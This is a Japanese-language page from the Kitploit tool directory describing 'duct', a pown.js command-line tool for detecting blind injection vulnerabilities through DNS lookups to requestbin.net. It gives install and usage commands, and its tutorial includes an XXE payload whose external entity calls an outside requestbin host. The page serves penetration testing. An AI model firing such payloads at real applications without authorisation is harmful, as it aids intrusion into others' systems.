Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
duct — ブラインドインジェクション攻撃を見つけるための必須ツール。 | Kitploit
ツール/GitHubGitHub/pownjs/duct
ウェブアプリケーション悪用情報収集DNS分析
GitHubpownjs/duct

duct

ブラインドインジェクション攻撃を見つけるための必須ツール。

リポジトリを見る
49137年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Follow on Twitter NPM Fury

Pown Duct

DNS サイドチャネルを使用したブラインドインジェクション攻撃の検出に不可欠なツール。

クレジット

このツールは secapps.com のオープンソースイニシアチブの一部です。

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

注: このツールは http://requestbin.net サービスを利用しています。将来のバージョンでは、専用のカスタム構築インフラストラクチャを使用する予定です。

クイックスタート

このツールは Pown.js の一部として使用することを想定していますが、独立したツールとして個別に呼び出すこともできます。

まず、通常通り Pown をインストールします。

root@kitploit:~
$ npm install -g pown@latest

Pown から直接呼び出します。

root@kitploit:~
$ pown duct

または、プロジェクトのルートからこのモジュールをローカルにインストールします。

root@kitploit:~
$ npm install @pown/duct --save

インストール後、pown cli を呼び出します。

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

グローバルの pown を使用してローカルでツールを呼び出すこともできます。

root@kitploit:~
$ POWN_ROOT=. pown duct

使い方

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

チュートリアル

SQL インジェクション、XSS、XXE、SSRF などの攻撃を実行する必要がある場合でも、ターゲットアプリケーションが脆弱性の兆候を示さないことがあります。脆弱性が存在するかどうかを確認する方法の 1 つは、有効な攻撃ベクターを注入し、DNS リゾルバーが制御されたドメインに問い合わせるように強制することです。解決が成功した場合、攻撃は成功とみなされます。

注意: Burp Collaborator に馴染みがあるかもしれません。Burp Collaborator は顧客向けに同様のサービスを提供しています。

まず、使い捨ての DNS 名を解決する必要があります。

root@kitploit:~
$ pown duct dns

screenshot

提供された DNS を使用してペイロードを作成します。たとえば、以下のコードは XXE 脆弱性が存在する場合に DNS 解決をトリガーする可能性があります。

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

攻撃が成功した場合、ターミナルにメッセージが表示されます。

screenshot

ツールをダウンロード